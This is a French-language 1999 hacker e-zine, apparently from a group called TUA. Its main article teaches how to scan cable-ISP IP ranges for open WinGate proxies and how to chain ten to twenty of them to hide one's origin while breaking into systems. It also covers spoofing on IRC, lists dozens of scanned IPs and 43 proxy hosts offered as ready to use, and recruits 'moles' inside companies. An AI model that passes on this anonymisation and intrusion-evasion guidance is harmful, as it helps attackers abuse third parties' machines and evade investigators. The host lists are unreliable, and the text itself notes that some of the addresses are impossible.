Comment reconnaître un serveur équipé de WinGate ? Connectez-vous à ce serveur par telnet sur le port 23 (telnet serveur.com 23 dans la commande exécuter du menu démarrer), si c'est un WinGate vous tomberez sur une invite ressemblant à ça :

WinGate>

Comment trouver un tel serveur ? Eh bien il n'y a pas de critère bien particulier qui permette d'identifier un serveur avec ou sans WinGate, mais on peut effectuer des recherches plutôt globales. Comme je vous l'ai dit ce sont souvent des personnes qui ont le câble qui sont équipées de WinGate, vous pouvez donc essayer de scanner les IP du style 24.1.x.x, c'est la rangée d'IP de la compagnie Cox Cable. Pour faire cela utilisez un dommain scanner, vous allez entrer par exemple 24.1.156.x et il va scanner tous les IP commençant par 24.1.156, puis il va vous dire lesquels répondent. Si vous n'avez pas déjà ce genre d'outils je vous conseille de le chercher (on le trouve assez facilement). J'ai commencé un peu le scan et voici les IP que j'ai trouvés qui répondent sur le port 1080 :

24.1.2.59
24.1.6.108
24.1.6.152
24.1.6.248
24.1.8.175
24.1.9.37
24.1.9.68 !!! gateway
24.1.9.127
24.1.9.199
24.1.9.213
24.1.9.224
24.1.9.245
24.1.10.48
24.1.10.121
24.1.10.209
24.1.11.58
24.1.11.116
24.1.12.220
24.1.13.80
24.1.15.197
24.1.15.240
24.1.18.190
24.1.18.209 !!! surement un gateway
24.1.19.128 !!! idem
24.1.19.142
24.1.24.229
24.1.24.251
24.1.25.204

Je me suis arrêté aux 24.1.25.x, mais je n'ai pas trouvé de WinGates. Une fois que vous avez votre liste d'IPs vous les telnettez sur le port 23 et vous regardez l'invite. Vous voyez ici que j'ai trouvé des GateWays, qui ont une invite ressemblant beaucoup à WinGate :
GateWay>
Le fonctionnement a l'air semblable, et je pense qu'on peut donc les utiliser aussi pour spoofer, mais je ne confirme pas, faute d'informations. Si vous connaissez les GateWays mailez moi.

Vous remarquez que j'ai scanné sur le port 1080, car ce port identifie les SOCKS Proxys, ce qui peut nous amener à tomber sur un WinGate. Donc en clair pour chercher des WinGates, vous pouvez essayer de trouver des IP de personnes ayant le câble, ou scanner des grandes rangées d'IP à la recherche du port 1080. Les IP que vous trouverez de cette manière seront généralement statiques. Mais il se peut que vous tombiez sur un IP dynamique, c'est à dire qu'il ne marchera qu'une fois, dès que le possesseur du WinGate se reconnectera son IP aura changé. Au lieu de vous lamenter sur votre sort estimez vous heureux, les WinGates dynamiques sont encore plus efficace, je vous expliquerai plus loin pourquoi. Regardez plutôt le format de cet IP dynamique, il est probable que l'ISP (Internet Service Provider) de cette personne reprenne le même format pour ses usagers. Par exemple si l'IP dynamique est 212.23.158.169, alors scannez les IP du style 212.23.158.x. Vous trouverez normalement une liste d'IP, et vous avez de bonnes chances pour trouver des WinGates dans le tas.

Note : les IP des WinGates ont généralement un dernier chiffre élevé, il y a donc plus de chances pour que 212.23.158.189 soit un WinGate que 212.23.158.2.




Maintenant vous savez en gros comment chercher des WinGates, maintenant que vous en avez vous voulez les utiliser pas vrai ? Comme leur nom l'indique, vous allez les utiliser tel un portail jusqu'à votre destination finale. Ex : telnettez votre WinGate sur le port 23, et tapez ce qui suit à l'invite :
WinGate> serveur.com 23
Ainsi vous vous conecterez sur serveur.com sur le port 23, mais entre le serveur et vous il y aura le WinGate. Le serveur envoie les infos que vous demandez au WinGate, qui vous les transmet. Dans ses logs le serveur verra donc le WinGate comme user, avec son IP etc... et pas le vôtre !

Maintenant vous voulez hacker le Pentagone... chouette, on se connecte sur notre WinGate favori, on se connecte sur le Pentagone, maintenant vous trouvez le flaw et vous changez le cours du dollar et envoyez des bombes atomiques sur les russes... le lendemain à 3 heures du mat' les SWAT débarquent dans votre chambre et tirant partout avec leurs MP-5 et en vous arrêtant pour conspiration, et vous êtes condamné à 6658 ans de peine de prison (mais en secret ils vous libèrent et emprisonnent un claudo à votre place et après vous bossez pour eux et vous vous faites gavé de tunes). En gros voici le schéma, mais vous remarquez que quelque chose a cloché quelque part. Ben oui vous vous êtes faits arrêter, c'est pas ce qu'il y a de mieux tout de même. Revoyons l'action au ralenti, lorsque les meilleurs spécialistes en informatique de la planète se sont mis à vous traquer : ils ont remarqué que vous vous étiez connecté sur eux quelques secondes seulement après que ce se soit fait et ils ont déjà commencé à vous tracer.... avant même que vous ayez eu le temps de faire la plus petite commande ils savent que vous êtes passé par un WinGate, avec son IP. Ils le contactent expressément sur le champ tout de suite et ils réquisitionnent ses logs, et là ils voient votre IP en clair parce que vous êtes connecté sur lui en ce moment même. Là ils contactent votre ISP, qui est bien obligé de leur dire qu'ils ont effectivement quelqu'un chez eux dont l'IP est 195.156.12.48, il leur balancent votre nom, adresse numéro de phone... et voilà comment se faire choper connement alors qu'on se croyait à l'abri...

Mais vous êtes en train de vous dire "Ouin, je veux hacker le pentagone sans me faire choper moi !!!". Certes, et je suis là pour vous dire comment faire héhéhé... Je vous présente maintenant la bounce technique... Comme vous êtes très fort vous avez toute une liste de WinGates prêts à être utilisés, et vous êtes hypers chauds pour hacker le pentagone. C'est parti. Connectez vous sur un WinGate comme d'habitude :
WinGate> wingate2.net 23
Quoi ? on est sur un WinGate et on se connecte sur un autre à partir de là ???
WinGate> wingate3.com 23
Mais ???
WinGate> wingate4.com 23
....

Je crois que vous avez compris là c'est bon. La technique est de se connecter sur un WinGate, puis à partir de là sur un deuxième, et encore sur un autre, puis sur un autre, et ainsi de suite... Maintenant si on vous trace on trouvera l'IP du dernier WinGate. Puis si on arrive à vous tracer plus loin (je suis pas sûr d'y arriver mais là je fais confiance au pentagone pour ça ! :o) ), on trouvera l'IP du deuxième WinGate etc... Autrement dit si vous êtes passé par 10 WinGates on mettra énormément de temps à vous tracer, d'autant plus que certains ne loggent pas leur activité ou l'effacent au bout de deux ou trois jours... Si vous bouncez 10 WinGates vous êtes le roi de la montagne, le fantôme du net, samouraï silencieux, le loup qui se faufile entre les mailles tissées par vos poursuivants.... De plus c'est pas moi qui le dit c'est les gars de Rhino9, à mon avis le plus grand groupe de hackers de tous les temps. Personnellement comme je suis de nature prudente et que j'aime pas que le SWAT débarque chez moi comme ça, je pense que je passerai plutôt par au moins 20 WinGates, au moins là je pense que vous serez tranquille !!!! ;^)




Une autre utilité des WinGates est l'IRC Spoofing. Pour cela (technique pour windows) lancez votre client IRC (mIRC on va dire) et tapez les commandes suivantes :
/server wingate.com
Le client se connecte sur le WinGate.
/quote irc.irc.net 6667
Vous vous connectez sur le serveur spécifié, port 6667
/quote user nq nq nq@serveur.com nq
/quote nick nq
Ces deux dernières lignes envoient vos infos, ou nq signifie "n'importe quoi", c'est à dire que vous marquez ce que vous voulez je pense. Enfin là je m'avance pas trop j'aime pas IRC j'y vais pas. Si cela ne marche pas c'est probablement que le serveur IRC ne vous permet pas de passer par un WinGate, vous ne pourrez pas vous connecter sur le serveur. Pour ceux qui veulent une copie du script anti-WinGate mailez-moi.




Maintenant en principe vous devriez être un pro des WinGates. Mais comme je suis très gentil, très fort, très intelligent, et... vous avez pas intérêt à me contredire sinon je vous donne pas ce que j'avais prévu !!! Bon... je disais, pour éviter de vous fatiguer voici une liste de WinGates prêts à être utilisés (43 si j'ai bien compté) :

proxy.amtvl.com:23
156-21.dr.cgocable.ca:23
bb1.betterbox.net:23
computer.fairnet.com:23
sun-170-233.sunwave.net:23
ns.matsugc.co.jp:23
195.96.97.236:23
noyan-tapan.am:23
itpeople.ozemail.com.au:23
med23502-9.gw.connect.com.au:23
sjc.cyberspace.com.br:23
194.213.242.259:23
194.213.242.1:23
194.213.242.257:23
computer.fairnet.com:23
ria2.rheintal.ch:23
ewwmail.ozemail.com.au:23
mail.alghanim.qualitynet.net:23
syd-56K-041.tpgi.com.au:23
ns.elaso.cz:23
194.213.242.202:23
delirium.swm.uni-mannheim.de:23
uni.eltron.ee:23
mel-56K-147.tpgi.com.au:23
raqhope.ozemail.com.au:23
ewwmail.ozemail.com.au:23
mail.colosio-tabasco.org.mx:23
n1.cal.hamura.tokyo.jp:23
dns.rikcad.co.jp:23
hardwickgw.apex.net.au:23
cbp2.dircon.co.uk:23
ria2.rheintal.ch:23
204.39.96.1:23
mail.colosio-tabasco.org.mx:23
bb1.betterbox.net:23
n1.cal.hamura.tokyo.jp:23
delirium.swm.uni-mannheim.de:23
3dillusion.com:23
dns.rikcad.co.jp:23
adissmtp.ozemail.com.au:23
hardwickgw.apex.net.au:23
wflanin.czcom.cz:23
ewwmail.ozemail.com.au:23

Je viens tout juste d'updater la liste (12 aout 1999), donc profitez en tant qu'ils marchent tous. Le :23 à la fin de chaque serveur signifie qu'il faut s'y connecter sur le port 23, au cas où vous auriez pas compris. Vous remarquerez qu'il y a deux IP se terminant par 1, ce qui contredit ce que j'ai dit tout à l'heure concernant les IP des WinGates, comme quoi il y a des exceptions. J'attire tout particulièrement votre attention sur deux IP qui me semblent très étranges : 194.213.242.259 et 194.213.242.257... vous avez remarqué ? Wut the hell is this ??? Théoriquement pour ceux qui ne le sauraient pas ce genre d'IPs est impossible, les numéros allant de 0 à 255. Si quelqu'un à la moindre idée de ce que cela peut bien être, qu'il me maile sur le champ !!!!

Bon ben maintenant je crois que j'ai plus qu'à vous souhaiter un bon spoofing. Et si vous trouvez des WinGates qui ne marchent plus ou des nouveaux (qui marchent eux), toujours pareil, mailez moi qu'on aie une liste à jour. Depuis le temps que je vous dis de me mailer je crois que je devrais vous la donner mon adresse : maddany@multimania.com.

---> bonne chance et allez pas vous faire choper, alors méfiance !


========================================================================
My name is OMM, X OOM !!!
========================================================================

Vous avez un compte chez Xoom ?
Super !!! Espace illimité etc...
Seulement, il y a un truc qui vous fais chier..., c'est la barre de pub
en haut de votre site...


Hé bien moi, le Grand Korben qui possède l'EGO le plus imposant de la planète
a trouvé la solution...
C'est très simple.

Au lieu de taper une adresse du type:

http://members.xoom.com/moncompte/

utilisez plutot cette adresse la:

http://members.xoom.com/_XOOM/moncompte/

En intercalant le /_XOOM/, pffuit !!! Plus de pub...
Merci qui ?
Merci Korben...


Korben00@Hotmail.com

[Nd MadDany : chtite nexplication, c'est parce que la vraie adresse où vos pages sont stockées est http://members.xoom.com/_XOOM/moncompte, et pas celle que l'on vous a donné. En tapant sans le _XOOM vous êtes redirigés vers une version modifiée automatiquement de vos pages, et évidemment ils ont pas pris la peine de nous avertir chez xoom ! :o)]
[Nd WA: Ca me parait évident..!!]

=====================================================================
ON RECHERCHE POUR NOTRE GROUPE
=====================================================================

-Des hackers, plein de hackers sous Windows / Linux ou autre...
Vous serez les piliers du groupe. Débutants ou expert, si vous aimez ça,
rejoignez-nous.

-Des graphistes pour le site.
Mes dessins sont un peu miteux les gars...

-Des programmeurs pour créer des logiciels qui nous faciliterons la tâche.
C'est fatiguant de hacker "à la main"

-Un hébergement gratos pour notre site avec accès ftp et http.
Ce serai sympa....

-Des "Chasseurs" pour trouver les sites sensibles
Alors, pour ceux qui n'ont pas peur, vous devrez vous ballader sur le web
pour relever des adresses (pédophile, racistes, ...etc voir la liste.) que nous
mettrons dans une Black list.

-Des taupes dans des entreprises pour des infos interressantes.
Pour être au courant avant tout le monde et taper là ou ça fait mal.

-Des traducteurs (Anglais/Russe/Allemand/Japonais/Chinois/Italien....)
Pour que nous puissions être compris du mond entier.

-Des contacts dans la presse pour exprimer nos idées.
Car la presse et notre "amie" et sera notre voie.

-Des écrivains pour écrire des articles pour le Zine (Tutorials, histoires,
chansons, pensées philosophiques...)
On a besoin de vos talents...

-Des pros de la sécurité pour nous aider à pas nous faire pincer.
Des gars qui pourront foutre des Firewalls partout sur le site et qui pourront
nous expliquer comment détourner tel ou tel système.

-Des codeurs et programmeurs de Démos pour nous faire un super spot de pub...
Là, on est gentils...

-Un gars qui pourrait nous filer un BOT pour notre irc

Merci et surtout, n'hésitez pas à vous inscrire....


=====================================================================
Rejoignez nous !!!
=====================================================================
Remplissez ce questionnaire et envoyez le moi à
White_Angel_TUA@Hotmail.com

IL FAUT ETRE MOTIVE ET ETRE TRES BON DANS SON DOMAINE !!!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nom:

Prénom:

Age:

Sexe:

E-Mail:

Adresse site web:

Langue(s) parlée(s):

Pays:

Surnom que vous voulez prendre au sein du groupe:

Ce que vous voulez faire dans le groupe:
-
-
-
-
-
-
Vos suggestions:
-
-
-
-
-
-
-
-
-

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Je vous attends nombreux...N'hésitez pas, nous acceptons tout le monde (Jeunes,
vieux, homme , femme , débutant , professionnel...MAIS MOTIVE ET QUI VEUT ALLER
LOIN !!!)
SAUF LES TETES BRULEES!!!!
[Nd MadDany : WA oublie toujours de préciser que c'est moi qui traite les inscriptions des femmes. C'est donc à moi qu'il faut envoyer votre inscription si vous disposez d'un héritage génétique féminin évident.]
[Nd WA: Non, n'écoutez pas (ne lisez pas ?) ce qu'il dit, car JE gère toutes
les inscriptions même celles des Demoiselles... ;-) ]

=====================================================================
REMERCIEMENTS
=====================================================================
Remerciements de White Angel :

-A MadDany, A Korben, A Moi aussi pour les articles du zines...
-Tous les hackers qui m'aident dans mon entreprise qui est je l'avoue ambitieuse.
-Vous qui me lisez et qui allez vous inscrire et distribuer nos zines.
-Et j'en oublie

Sinon, j'emmerde tjrs FT.

Remerciements de MadDany :

-A WA parce qu'il m'a remercié (c'est beau l'amitié...)
-A moi, parce que je m'aime [Nd WA: Nous aussi on t'aime..]
-A mon ordinateur parce qu'il m'aime aussi. Si c'est possible !

Remerciements de Korben :
-WA
-MAdDanY
-Mes amis (Merci Tchang !!)
-Jésus
-Mes pôtes du channel #TUA
-Et à vous, amis lecteurs que j'aimes...


REJOIGNEZ NOUS !!!

HTTP://WWW.UNDERGROUNDANGEL.CJB.NET


ATTENTION: Message pour les membres du groupe et pour ceux qui seraient susceptible
de nous rejoindre....
JE VAIS FAIRE UN GRAND TRI DANS LES MEMBRES...

Ca va se résumer en 2 groupes:

Ceux qui sont motivés et qui se bougent--->On Garde
Et ceux qui ne foutent rien----> On vire !
[Nd MadDany : oué !]

Voilà, j'espère que ça vous a plus...A+

=====================================================================
A LA PROCHAINE !!!
=====================================================================

___________ ____
______/ \__// \__/____\
_/ \_/ : //____\\
/| : : .. / \
| | :: :: \ /
| | :| || \ \______/
| | || || |\ / |
\| || || | / | \
| || || | / /_\ \
| ___ || ___ || | / / \
\_-_/ \_-_/ | ____ |/__/ \
_\_--_/ \ /
/____ /
/ \ /
\______\_________/

BOUGE TOI !!!!!!

That's all


HTTP://WWW.MULTIMANIA.COM/TUA/
HTTP://UNDERGROUNDANGEL.CJB.NET
Sur irc.kewl.org -----> #tua (on recherche un bot !!!)
White Angel: White_Angel_TUA@Hotmail.com

A+
White Angel

← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT